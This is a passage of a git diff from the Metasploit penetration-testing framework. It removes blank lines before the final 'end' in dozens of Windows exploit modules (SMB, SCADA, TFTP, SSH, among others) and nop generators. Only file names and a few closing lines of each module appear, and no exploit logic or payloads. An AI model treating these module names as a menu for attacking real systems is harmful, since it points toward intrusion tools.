b/modules/exploits/windows/proxy/bluecoat_winproxy_host.rb index cafeffe631..e7d71de3f7 100644 --- a/modules/exploits/windows/proxy/bluecoat_winproxy_host.rb +++ b/modules/exploits/windows/proxy/bluecoat_winproxy_host.rb @@ -72,5 +72,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb b/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb index 8d63dac1ef..9baf8f4a82 100644 --- a/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb +++ b/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb @@ -74,5 +74,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/proxy/proxypro_http_get.rb b/modules/exploits/windows/proxy/proxypro_http_get.rb index 67b8339551..c5155ce7a4 100644 --- a/modules/exploits/windows/proxy/proxypro_http_get.rb +++ b/modules/exploits/windows/proxy/proxypro_http_get.rb @@ -65,5 +65,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb b/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb index 684c03fda2..7e6d57a335 100644 --- a/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb +++ b/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb @@ -80,5 +80,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/scada/daq_factory_bof.rb b/modules/exploits/windows/scada/daq_factory_bof.rb index d21db3d590..384598bdd8 100644 --- a/modules/exploits/windows/scada/daq_factory_bof.rb +++ b/modules/exploits/windows/scada/daq_factory_bof.rb @@ -112,5 +112,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect_udp end - end diff --git a/modules/exploits/windows/scada/factorylink_vrn_09.rb b/modules/exploits/windows/scada/factorylink_vrn_09.rb index 3ebd56b202..5c0419c8cd 100644 --- a/modules/exploits/windows/scada/factorylink_vrn_09.rb +++ b/modules/exploits/windows/scada/factorylink_vrn_09.rb @@ -83,5 +83,4 @@ class MetasploitModule < Msf::Exploit::Remote disconnect end - end diff --git a/modules/exploits/windows/scada/ge_proficy_cimplicity_gefebt.rb b/modules/exploits/windows/scada/ge_proficy_cimplicity_gefebt.rb index 36304ad77b..55241243be 100644 --- a/modules/exploits/windows/scada/ge_proficy_cimplicity_gefebt.rb +++ b/modules/exploits/windows/scada/ge_proficy_cimplicity_gefebt.rb @@ -313,5 +313,4 @@ End Sub full_path = store_local(ltype, nil, data, fname) print_good("#{fname} stored at #{full_path}") end - end diff --git a/modules/exploits/windows/scada/iconics_genbroker.rb b/modules/exploits/windows/scada/iconics_genbroker.rb index 6987e21f1b..768edd4c5a 100644 --- a/modules/exploits/windows/scada/iconics_genbroker.rb +++ b/modules/exploits/windows/scada/iconics_genbroker.rb @@ -340,5 +340,4 @@ db 0x00 disconnect end - end diff --git a/modules/exploits/windows/scada/igss9_igssdataserver_listall.rb b/modules/exploits/windows/scada/igss9_igssdataserver_listall.rb index 1fdc16f497..c10f91915f 100644 --- a/modules/exploits/windows/scada/igss9_igssdataserver_listall.rb +++ b/modules/exploits/windows/scada/igss9_igssdataserver_listall.rb @@ -163,5 +163,4 @@ class MetasploitModule < Msf::Exploit::Remote disconnect end - end diff --git a/modules/exploits/windows/scada/igss_exec_17.rb b/modules/exploits/windows/scada/igss_exec_17.rb index b84aefe701..303d24d259 100644 --- a/modules/exploits/windows/scada/igss_exec_17.rb +++ b/modules/exploits/windows/scada/igss_exec_17.rb @@ -71,5 +71,4 @@ class MetasploitModule < Msf::Exploit::Remote disconnect end - end diff --git a/modules/exploits/windows/scada/indusoft_webstudio_exec.rb b/modules/exploits/windows/scada/indusoft_webstudio_exec.rb index b06355232c..b8bb31afa7 100644 --- a/modules/exploits/windows/scada/indusoft_webstudio_exec.rb +++ b/modules/exploits/windows/scada/indusoft_webstudio_exec.rb @@ -188,5 +188,4 @@ class MetasploitModule < Msf::Exploit::Remote end end - end diff --git a/modules/exploits/windows/scada/procyon_core_server.rb b/modules/exploits/windows/scada/procyon_core_server.rb index 38f2d2d391..8d606fa836 100644 --- a/modules/exploits/windows/scada/procyon_core_server.rb +++ b/modules/exploits/windows/scada/procyon_core_server.rb @@ -108,5 +108,4 @@ class MetasploitModule < Msf::Exploit::Remote disconnect end - end diff --git a/modules/exploits/windows/scada/realwin.rb b/modules/exploits/windows/scada/realwin.rb index a714d665b3..c86cee7cae 100644 --- a/modules/exploits/windows/scada/realwin.rb +++ b/modules/exploits/windows/scada/realwin.rb @@ -68,5 +68,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/scada/realwin_on_fc_binfile_a.rb b/modules/exploits/windows/scada/realwin_on_fc_binfile_a.rb index c1efb51b39..597a8e140c 100644 --- a/modules/exploits/windows/scada/realwin_on_fc_binfile_a.rb +++ b/modules/exploits/windows/scada/realwin_on_fc_binfile_a.rb @@ -79,7 +79,6 @@ class MetasploitModule < Msf::Exploit::Remote disconnect end - end diff --git a/modules/exploits/windows/scada/realwin_on_fcs_login.rb b/modules/exploits/windows/scada/realwin_on_fcs_login.rb index 23665af528..3a31d6fcf6 100644 --- a/modules/exploits/windows/scada/realwin_on_fcs_login.rb +++ b/modules/exploits/windows/scada/realwin_on_fcs_login.rb @@ -80,5 +80,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/scada/realwin_scpc_initialize.rb b/modules/exploits/windows/scada/realwin_scpc_initialize.rb index ebf1e7c44e..8fb4ab8968 100644 --- a/modules/exploits/windows/scada/realwin_scpc_initialize.rb +++ b/modules/exploits/windows/scada/realwin_scpc_initialize.rb @@ -67,5 +67,4 @@ class MetasploitModule < Msf::Exploit::Remote disconnect end - end diff --git a/modules/exploits/windows/scada/realwin_scpc_initialize_rf.rb b/modules/exploits/windows/scada/realwin_scpc_initialize_rf.rb index 19b7d6e83a..3134d10900 100644 --- a/modules/exploits/windows/scada/realwin_scpc_initialize_rf.rb +++ b/modules/exploits/windows/scada/realwin_scpc_initialize_rf.rb @@ -67,5 +67,4 @@ class MetasploitModule < Msf::Exploit::Remote disconnect end - end diff --git a/modules/exploits/windows/scada/realwin_scpc_txtevent.rb b/modules/exploits/windows/scada/realwin_scpc_txtevent.rb index 5c39562748..7a0455be74 100644 --- a/modules/exploits/windows/scada/realwin_scpc_txtevent.rb +++ b/modules/exploits/windows/scada/realwin_scpc_txtevent.rb @@ -67,5 +67,4 @@ class MetasploitModule < Msf::Exploit::Remote disconnect end - end diff --git a/modules/exploits/windows/scada/scadapro_cmdexe.rb b/modules/exploits/windows/scada/scadapro_cmdexe.rb index cd83ce778f..66c459a0d8 100644 --- a/modules/exploits/windows/scada/scadapro_cmdexe.rb +++ b/modules/exploits/windows/scada/scadapro_cmdexe.rb @@ -123,5 +123,4 @@ class MetasploitModule < Msf::Exploit::Remote super end - end diff --git a/modules/exploits/windows/scada/sunway_force_control_netdbsrv.rb b/modules/exploits/windows/scada/sunway_force_control_netdbsrv.rb index 7e442a54ca..78b78bd0cc 100644 --- a/modules/exploits/windows/scada/sunway_force_control_netdbsrv.rb +++ b/modules/exploits/windows/scada/sunway_force_control_netdbsrv.rb @@ -82,5 +82,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/scada/winlog_runtime.rb b/modules/exploits/windows/scada/winlog_runtime.rb index be75c431d9..42037bcc9d 100644 --- a/modules/exploits/windows/scada/winlog_runtime.rb +++ b/modules/exploits/windows/scada/winlog_runtime.rb @@ -66,5 +66,4 @@ class MetasploitModule < Msf::Exploit::Remote disconnect end - end diff --git a/modules/exploits/windows/scada/yokogawa_bkbcopyd_bof.rb b/modules/exploits/windows/scada/yokogawa_bkbcopyd_bof.rb index b50418b688..714c2ff420 100644 --- a/modules/exploits/windows/scada/yokogawa_bkbcopyd_bof.rb +++ b/modules/exploits/windows/scada/yokogawa_bkbcopyd_bof.rb @@ -99,6 +99,5 @@ class MetasploitModule < Msf::Exploit::Remote return false unless data =~ /500 'yyparse error': command not understood/ return true end - end diff --git a/modules/exploits/windows/scada/yokogawa_bkesimmgr_bof.rb b/modules/exploits/windows/scada/yokogawa_bkesimmgr_bof.rb index 64402ecde7..04764eb197 100644 --- a/modules/exploits/windows/scada/yokogawa_bkesimmgr_bof.rb +++ b/modules/exploits/windows/scada/yokogawa_bkesimmgr_bof.rb @@ -154,5 +154,4 @@ class MetasploitModule < Msf::Exploit::Remote valid end - end diff --git a/modules/exploits/windows/scada/yokogawa_bkfsim_vhfd.rb b/modules/exploits/windows/scada/yokogawa_bkfsim_vhfd.rb index 1c66b02398..ac0d95e41e 100644 --- a/modules/exploits/windows/scada/yokogawa_bkfsim_vhfd.rb +++ b/modules/exploits/windows/scada/yokogawa_bkfsim_vhfd.rb @@ -68,6 +68,5 @@ class MetasploitModule < Msf::Exploit::Remote disconnect_udp end - end diff --git a/modules/exploits/windows/scada/yokogawa_bkhodeq_bof.rb b/modules/exploits/windows/scada/yokogawa_bkhodeq_bof.rb index e3c4804bc7..ed096b555c 100644 --- a/modules/exploits/windows/scada/yokogawa_bkhodeq_bof.rb +++ b/modules/exploits/windows/scada/yokogawa_bkhodeq_bof.rb @@ -165,5 +165,4 @@ class MetasploitModule < Msf::Exploit::Remote rop_gadgets end - end diff --git a/modules/exploits/windows/sip/aim_triton_cseq.rb b/modules/exploits/windows/sip/aim_triton_cseq.rb index a195490f98..e7a70ac5eb 100644 --- a/modules/exploits/windows/sip/aim_triton_cseq.rb +++ b/modules/exploits/windows/sip/aim_triton_cseq.rb @@ -77,5 +77,4 @@ class MetasploitModule < Msf::Exploit::Remote disconnect_udp end - end diff --git a/modules/exploits/windows/sip/sipxezphone_cseq.rb b/modules/exploits/windows/sip/sipxezphone_cseq.rb index 2b66660583..bd1fc1191b 100644 --- a/modules/exploits/windows/sip/sipxezphone_cseq.rb +++ b/modules/exploits/windows/sip/sipxezphone_cseq.rb @@ -80,5 +80,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect_udp end - end diff --git a/modules/exploits/windows/sip/sipxphone_cseq.rb b/modules/exploits/windows/sip/sipxphone_cseq.rb index dc775f68c6..ff8cc79271 100644 --- a/modules/exploits/windows/sip/sipxphone_cseq.rb +++ b/modules/exploits/windows/sip/sipxphone_cseq.rb @@ -77,5 +77,4 @@ class MetasploitModule < Msf::Exploit::Remote disconnect_udp end - end diff --git a/modules/exploits/windows/smb/generic_smb_dll_injection.rb b/modules/exploits/windows/smb/generic_smb_dll_injection.rb index 883a3ae4dc..a08312af8b 100644 --- a/modules/exploits/windows/smb/generic_smb_dll_injection.rb +++ b/modules/exploits/windows/smb/generic_smb_dll_injection.rb @@ -60,5 +60,4 @@ class MetasploitModule < Msf::Exploit::Remote self.file_name = datastore['FILE_NAME'] || "#{Rex::Text.rand_text_alpha(4 + rand(3))}.dll" print_status("File available on #{unc}...") end - end diff --git a/modules/exploits/windows/smb/ipass_pipe_exec.rb b/modules/exploits/windows/smb/ipass_pipe_exec.rb index 16d036e27c..054eb41c4a 100644 --- a/modules/exploits/windows/smb/ipass_pipe_exec.rb +++ b/modules/exploits/windows/smb/ipass_pipe_exec.rb @@ -108,5 +108,4 @@ class MetasploitModule < Msf::Exploit::Remote # do nothing... just finish exploit and stop smb server... end end - end diff --git a/modules/exploits/windows/smb/ms03_049_netapi.rb b/modules/exploits/windows/smb/ms03_049_netapi.rb index 5ccf0f69e8..de1eadf3b8 100644 --- a/modules/exploits/windows/smb/ms03_049_netapi.rb +++ b/modules/exploits/windows/smb/ms03_049_netapi.rb @@ -102,5 +102,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/smb/ms04_007_killbill.rb b/modules/exploits/windows/smb/ms04_007_killbill.rb index 48ce075612..b4041442ec 100644 --- a/modules/exploits/windows/smb/ms04_007_killbill.rb +++ b/modules/exploits/windows/smb/ms04_007_killbill.rb @@ -246,5 +246,4 @@ class MetasploitModule < Msf::Exploit::Remote return token end - end diff --git a/modules/exploits/windows/smb/ms04_031_netdde.rb b/modules/exploits/windows/smb/ms04_031_netdde.rb index fb92a06700..1ac50f6346 100644 --- a/modules/exploits/windows/smb/ms04_031_netdde.rb +++ b/modules/exploits/windows/smb/ms04_031_netdde.rb @@ -86,5 +86,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/smb/ms05_039_pnp.rb b/modules/exploits/windows/smb/ms05_039_pnp.rb index 5a7b4b90da..48ab603ed1 100644 --- a/modules/exploits/windows/smb/ms05_039_pnp.rb +++ b/modules/exploits/windows/smb/ms05_039_pnp.rb @@ -454,5 +454,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb b/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb index ca4968cf95..fb5959fafc 100644 --- a/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb +++ b/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb @@ -169,5 +169,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/smb/ms06_025_rras.rb b/modules/exploits/windows/smb/ms06_025_rras.rb index 0906160b3e..df8965c479 100644 --- a/modules/exploits/windows/smb/ms06_025_rras.rb +++ b/modules/exploits/windows/smb/ms06_025_rras.rb @@ -122,5 +122,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/smb/ms06_040_netapi.rb b/modules/exploits/windows/smb/ms06_040_netapi.rb index 997e6df4a3..2a0ecf7777 100644 --- a/modules/exploits/windows/smb/ms06_040_netapi.rb +++ b/modules/exploits/windows/smb/ms06_040_netapi.rb @@ -318,5 +318,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/smb/ms06_066_nwapi.rb b/modules/exploits/windows/smb/ms06_066_nwapi.rb index eb2d3e8567..3866f910d1 100644 --- a/modules/exploits/windows/smb/ms06_066_nwapi.rb +++ b/modules/exploits/windows/smb/ms06_066_nwapi.rb @@ -130,5 +130,4 @@ class MetasploitModule < Msf::Exploit::Remote return false end end - end diff --git a/modules/exploits/windows/smb/ms06_066_nwwks.rb b/modules/exploits/windows/smb/ms06_066_nwwks.rb index 8eaa5669d8..2eb46e407b 100644 --- a/modules/exploits/windows/smb/ms06_066_nwwks.rb +++ b/modules/exploits/windows/smb/ms06_066_nwwks.rb @@ -116,5 +116,4 @@ class MetasploitModule < Msf::Exploit::Remote return false end end - end diff --git a/modules/exploits/windows/smb/ms06_070_wkssvc.rb b/modules/exploits/windows/smb/ms06_070_wkssvc.rb index 7416195266..cd830b006f 100644 --- a/modules/exploits/windows/smb/ms06_070_wkssvc.rb +++ b/modules/exploits/windows/smb/ms06_070_wkssvc.rb @@ -152,7 +152,6 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/smb/ms07_029_msdns_zonename.rb b/modules/exploits/windows/smb/ms07_029_msdns_zonename.rb index 97808b5803..c13f203b9f 100644 --- a/modules/exploits/windows/smb/ms07_029_msdns_zonename.rb +++ b/modules/exploits/windows/smb/ms07_029_msdns_zonename.rb @@ -262,5 +262,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/smb/ms09_050_smb2_negotiate_func_index.rb b/modules/exploits/windows/smb/ms09_050_smb2_negotiate_func_index.rb index c8fe6bdc2e..e4b797881b 100644 --- a/modules/exploits/windows/smb/ms09_050_smb2_negotiate_func_index.rb +++ b/modules/exploits/windows/smb/ms09_050_smb2_negotiate_func_index.rb @@ -139,5 +139,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/smb/ms10_061_spoolss.rb b/modules/exploits/windows/smb/ms10_061_spoolss.rb index c642b1f268..fa43b5edbb 100644 --- a/modules/exploits/windows/smb/ms10_061_spoolss.rb +++ b/modules/exploits/windows/smb/ms10_061_spoolss.rb @@ -433,5 +433,4 @@ class MetasploitModule < Msf::Exploit::Remote def wfs_delay 10 end - end diff --git a/modules/exploits/windows/smb/ms17_010_eternalblue.rb b/modules/exploits/windows/smb/ms17_010_eternalblue.rb index 43b99192e3..1ea96d0646 100644 --- a/modules/exploits/windows/smb/ms17_010_eternalblue.rb +++ b/modules/exploits/windows/smb/ms17_010_eternalblue.rb @@ -726,5 +726,4 @@ class MetasploitModule < Msf::Exploit::Remote '' end end - end diff --git a/modules/exploits/windows/smb/psexec.rb b/modules/exploits/windows/smb/psexec.rb index 5ba7fb3afe..53e5dbe18b 100644 --- a/modules/exploits/windows/smb/psexec.rb +++ b/modules/exploits/windows/smb/psexec.rb @@ -326,5 +326,4 @@ class MetasploitModule < Msf::Exploit::Remote login_data.merge!(service_data) create_credential_login(login_data) end - end diff --git a/modules/exploits/windows/smb/psexec_psh.rb b/modules/exploits/windows/smb/psexec_psh.rb index 6e8919c171..116e17bb10 100644 --- a/modules/exploits/windows/smb/psexec_psh.rb +++ b/modules/exploits/windows/smb/psexec_psh.rb @@ -96,6 +96,5 @@ class MetasploitModule < Msf::Exploit::Remote end end end - end diff --git a/modules/exploits/windows/smb/smb_relay.rb b/modules/exploits/windows/smb/smb_relay.rb index a0b5f33043..ceb58d3b3f 100644 --- a/modules/exploits/windows/smb/smb_relay.rb +++ b/modules/exploits/windows/smb/smb_relay.rb @@ -753,5 +753,4 @@ class MetasploitModule < Msf::Exploit::Remote raise failure end end - end diff --git a/modules/exploits/windows/smb/timbuktu_plughntcommand_bof.rb b/modules/exploits/windows/smb/timbuktu_plughntcommand_bof.rb index cdc42f3150..583c5b9d73 100644 --- a/modules/exploits/windows/smb/timbuktu_plughntcommand_bof.rb +++ b/modules/exploits/windows/smb/timbuktu_plughntcommand_bof.rb @@ -148,5 +148,4 @@ class MetasploitModule < Msf::Exploit::Remote pipe.write(buf) end - end diff --git a/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb b/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb index 0a1ca32c3e..abd66b1426 100644 --- a/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb +++ b/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb @@ -75,5 +75,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/smtp/mercury_cram_md5.rb b/modules/exploits/windows/smtp/mercury_cram_md5.rb index 67a8024daf..1b0f3ecd44 100644 --- a/modules/exploits/windows/smtp/mercury_cram_md5.rb +++ b/modules/exploits/windows/smtp/mercury_cram_md5.rb @@ -70,5 +70,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/smtp/sysgauge_client_bof.rb b/modules/exploits/windows/smtp/sysgauge_client_bof.rb index 39deafab97..806bbfda30 100644 --- a/modules/exploits/windows/smtp/sysgauge_client_bof.rb +++ b/modules/exploits/windows/smtp/sysgauge_client_bof.rb @@ -76,5 +76,4 @@ class MetasploitModule < Msf::Exploit::Remote c.put(sploit) end - end diff --git a/modules/exploits/windows/smtp/wmailserver.rb b/modules/exploits/windows/smtp/wmailserver.rb index 225e784d94..1a149a4974 100644 --- a/modules/exploits/windows/smtp/wmailserver.rb +++ b/modules/exploits/windows/smtp/wmailserver.rb @@ -59,5 +59,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/smtp/ypops_overflow1.rb b/modules/exploits/windows/smtp/ypops_overflow1.rb index ef908d3143..102a33833e 100644 --- a/modules/exploits/windows/smtp/ypops_overflow1.rb +++ b/modules/exploits/windows/smtp/ypops_overflow1.rb @@ -84,5 +84,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/ssh/freesshd_authbypass.rb b/modules/exploits/windows/ssh/freesshd_authbypass.rb index e18d316150..11765dfa48 100644 --- a/modules/exploits/windows/ssh/freesshd_authbypass.rb +++ b/modules/exploits/windows/ssh/freesshd_authbypass.rb @@ -162,6 +162,5 @@ class MetasploitModule < Msf::Exploit::Remote execute_cmdstager(flavor: :vbs, decoder: default_decoder(:vbs), linemax: 1700) end end - end diff --git a/modules/exploits/windows/ssh/putty_msg_debug.rb b/modules/exploits/windows/ssh/putty_msg_debug.rb index 62ffa4a9b4..724ccece37 100644 --- a/modules/exploits/windows/ssh/putty_msg_debug.rb +++ b/modules/exploits/windows/ssh/putty_msg_debug.rb @@ -77,5 +77,4 @@ class MetasploitModule < Msf::Exploit::Remote service.close_client(client) end - end diff --git a/modules/exploits/windows/ssh/securecrt_ssh1.rb b/modules/exploits/windows/ssh/securecrt_ssh1.rb index 777ac63d22..de80b8cee4 100644 --- a/modules/exploits/windows/ssh/securecrt_ssh1.rb +++ b/modules/exploits/windows/ssh/securecrt_ssh1.rb @@ -66,5 +66,4 @@ class MetasploitModule < Msf::Exploit::Remote service.close_client(client) end - end diff --git a/modules/exploits/windows/ssl/ms04_011_pct.rb b/modules/exploits/windows/ssl/ms04_011_pct.rb index 6f3b845dc9..7f588bc72c 100644 --- a/modules/exploits/windows/ssl/ms04_011_pct.rb +++ b/modules/exploits/windows/ssl/ms04_011_pct.rb @@ -189,5 +189,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb b/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb index fd664b5641..6d522b9af9 100644 --- a/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb +++ b/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb @@ -108,5 +108,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/telnet/goodtech_telnet.rb b/modules/exploits/windows/telnet/goodtech_telnet.rb index 0649c25031..9e2c278d78 100644 --- a/modules/exploits/windows/telnet/goodtech_telnet.rb +++ b/modules/exploits/windows/telnet/goodtech_telnet.rb @@ -66,5 +66,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/tftp/attftp_long_filename.rb b/modules/exploits/windows/tftp/attftp_long_filename.rb index 91e9ccc131..bcdffa1878 100644 --- a/modules/exploits/windows/tftp/attftp_long_filename.rb +++ b/modules/exploits/windows/tftp/attftp_long_filename.rb @@ -72,5 +72,4 @@ class MetasploitModule < Msf::Exploit::Remote disconnect_udp end - end diff --git a/modules/exploits/windows/tftp/dlink_long_filename.rb b/modules/exploits/windows/tftp/dlink_long_filename.rb index 8e3cde787e..492cabda2b 100644 --- a/modules/exploits/windows/tftp/dlink_long_filename.rb +++ b/modules/exploits/windows/tftp/dlink_long_filename.rb @@ -76,5 +76,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect_udp end - end diff --git a/modules/exploits/windows/tftp/futuresoft_transfermode.rb b/modules/exploits/windows/tftp/futuresoft_transfermode.rb index bcbc6f0a5b..5bfda44bda 100644 --- a/modules/exploits/windows/tftp/futuresoft_transfermode.rb +++ b/modules/exploits/windows/tftp/futuresoft_transfermode.rb @@ -73,5 +73,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect_udp end - end diff --git a/modules/exploits/windows/tftp/opentftp_error_code.rb b/modules/exploits/windows/tftp/opentftp_error_code.rb index d211f35438..63323e8808 100644 --- a/modules/exploits/windows/tftp/opentftp_error_code.rb +++ b/modules/exploits/windows/tftp/opentftp_error_code.rb @@ -88,7 +88,6 @@ class MetasploitModule < Msf::Exploit::Remote disconnect_udp end - end =begin diff --git a/modules/exploits/windows/tftp/quick_tftp_pro_mode.rb b/modules/exploits/windows/tftp/quick_tftp_pro_mode.rb index 2a83d2b480..fa03ae41cb 100644 --- a/modules/exploits/windows/tftp/quick_tftp_pro_mode.rb +++ b/modules/exploits/windows/tftp/quick_tftp_pro_mode.rb @@ -68,5 +68,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect_udp end - end diff --git a/modules/exploits/windows/tftp/tftpd32_long_filename.rb b/modules/exploits/windows/tftp/tftpd32_long_filename.rb index 08d2b16917..7259556573 100644 --- a/modules/exploits/windows/tftp/tftpd32_long_filename.rb +++ b/modules/exploits/windows/tftp/tftpd32_long_filename.rb @@ -70,5 +70,4 @@ class MetasploitModule < Msf::Exploit::Remote disconnect_udp end - end diff --git a/modules/exploits/windows/tftp/tftpdwin_long_filename.rb b/modules/exploits/windows/tftp/tftpdwin_long_filename.rb index 4979dac733..debd29daf4 100644 --- a/modules/exploits/windows/tftp/tftpdwin_long_filename.rb +++ b/modules/exploits/windows/tftp/tftpdwin_long_filename.rb @@ -59,5 +59,4 @@ class MetasploitModule < Msf::Exploit::Remote disconnect_udp end - end diff --git a/modules/exploits/windows/tftp/tftpserver_wrq_bof.rb b/modules/exploits/windows/tftp/tftpserver_wrq_bof.rb index 0cb060a5a0..a496ade735 100644 --- a/modules/exploits/windows/tftp/tftpserver_wrq_bof.rb +++ b/modules/exploits/windows/tftp/tftpserver_wrq_bof.rb @@ -89,5 +89,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect_udp end - end diff --git a/modules/exploits/windows/tftp/threectftpsvc_long_mode.rb b/modules/exploits/windows/tftp/threectftpsvc_long_mode.rb index cebb57e48d..2c2b00515a 100644 --- a/modules/exploits/windows/tftp/threectftpsvc_long_mode.rb +++ b/modules/exploits/windows/tftp/threectftpsvc_long_mode.rb @@ -59,5 +59,4 @@ class MetasploitModule < Msf::Exploit::Remote disconnect_udp end - end diff --git a/modules/exploits/windows/unicenter/cam_log_security.rb b/modules/exploits/windows/unicenter/cam_log_security.rb index 2b7a2319f4..94fd1918f5 100644 --- a/modules/exploits/windows/unicenter/cam_log_security.rb +++ b/modules/exploits/windows/unicenter/cam_log_security.rb @@ -76,5 +76,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/vnc/realvnc_client.rb b/modules/exploits/windows/vnc/realvnc_client.rb index 9c7788a680..fdc8411933 100644 --- a/modules/exploits/windows/vnc/realvnc_client.rb +++ b/modules/exploits/windows/vnc/realvnc_client.rb @@ -72,5 +72,4 @@ class MetasploitModule < Msf::Exploit::Remote handler service.close_client(client) end - end diff --git a/modules/exploits/windows/vnc/ultravnc_client.rb b/modules/exploits/windows/vnc/ultravnc_client.rb index 04e8f3a118..7a3a3b8d27 100644 --- a/modules/exploits/windows/vnc/ultravnc_client.rb +++ b/modules/exploits/windows/vnc/ultravnc_client.rb @@ -73,5 +73,4 @@ class MetasploitModule < Msf::Exploit::Remote handler service.close_client(client) end - end diff --git a/modules/exploits/windows/vnc/winvnc_http_get.rb b/modules/exploits/windows/vnc/winvnc_http_get.rb index 4d31dd6209..931b5c66bf 100644 --- a/modules/exploits/windows/vnc/winvnc_http_get.rb +++ b/modules/exploits/windows/vnc/winvnc_http_get.rb @@ -65,5 +65,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/windows/winrm/winrm_script_exec.rb b/modules/exploits/windows/winrm/winrm_script_exec.rb index f250ab58b0..a07cd233e5 100644 --- a/modules/exploits/windows/winrm/winrm_script_exec.rb +++ b/modules/exploits/windows/winrm/winrm_script_exec.rb @@ -234,5 +234,4 @@ class MetasploitModule < Msf::Exploit::Remote end return true end - end diff --git a/modules/exploits/windows/wins/ms04_045_wins.rb b/modules/exploits/windows/wins/ms04_045_wins.rb index 717ddc4f65..7461590c4e 100644 --- a/modules/exploits/windows/wins/ms04_045_wins.rb +++ b/modules/exploits/windows/wins/ms04_045_wins.rb @@ -198,5 +198,4 @@ class MetasploitModule < Msf::Exploit::Remote return ret end - end diff --git a/modules/nops/armle/simple.rb b/modules/nops/armle/simple.rb index 43fb75d128..871a5f23e7 100644 --- a/modules/nops/armle/simple.rb +++ b/modules/nops/armle/simple.rb @@ -54,5 +54,4 @@ class MetasploitModule < Msf::Nop return ([nops[0]].pack("V*") * (length/4)) end - end diff --git a/modules/nops/mipsbe/better.rb b/modules/nops/mipsbe/better.rb index 0f8e4b5529..71ef81a8a5 100644 --- a/modules/nops/mipsbe/better.rb +++ b/modules/nops/mipsbe/better.rb @@ -98,6 +98,5 @@ class MetasploitModule < Msf::Nop return sled end - end diff --git a/modules/nops/php/generic.rb b/modules/nops/php/generic.rb index cfa357440d..cf54b86284 100644 --- a/modules/nops/php/generic.rb +++ b/modules/nops/php/generic.rb @@ -25,5 +25,4 @@ class MetasploitModule < Msf::Nop # Default to just spaces for now " " * length end - end diff --git a/modules/nops/ppc/simple.rb b/modules/nops/ppc/simple.rb index 23fe45415c..afb9926625 100644 --- a/modules/nops/ppc/simple.rb +++ b/modules/nops/ppc/simple.rb @@ -57,5 +57,4 @@ class MetasploitModule < Msf::Nop return ("\x60" * length)[0, length] end - end diff --git a/modules/nops/sparc/random.rb b/modules/nops/sparc/random.rb index f6f528a253..33e229247e 100644 --- a/modules/nops/sparc/random.rb +++ b/modules/nops/sparc/random.rb @@ -203,5 +203,4 @@ class MetasploitModule < Msf::Nop rand(len - 1) + 1 ].pack('N') end - end diff --git a/modules/nops/tty/generic.rb b/modules/nops/tty/generic.rb index 4db901c03f..49a398c010 100644 --- a/modules/nops/tty/generic.rb +++ b/modules/nops/tty/generic.rb @@ -25,5 +25,4 @@ class MetasploitModule < Msf::Nop # Default to just spaces for now " " * length end - end diff --git a/modules/nops/x64/simple.rb b/modules/nops/x64/simple.rb index 